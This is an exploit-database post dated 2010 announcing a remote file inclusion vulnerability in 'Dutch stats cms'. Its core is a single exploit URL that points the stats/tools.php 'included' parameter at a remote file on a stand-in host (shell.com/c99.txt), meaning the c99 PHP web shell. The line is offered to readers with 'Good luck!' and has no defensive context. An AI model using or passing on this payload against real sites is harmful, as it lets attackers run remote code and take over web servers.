id: 12451
date: 05/30/2010
title: Dutch stats cms Remote file inclusion
author: Poltergeisth4cker
cves: 

=====================================
Dutch stats cms Remote file inclusion
=====================================


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Dutch stats cms Remote file inclusion
+++++++++++++++++++++++++++++++++++++++++++++
Discovered by: Poltergeisth4cker
My country: Netherlands 
Contact: Poltergeisth4cker@hotmail.com

=============================================================================================================
 Exploit RFI:


 stats/tools.php?included=[Http://shell.com/c99.txt]
 

Good luck!
 
=============================================================================================================




#  0day.today [2023-03-24]  #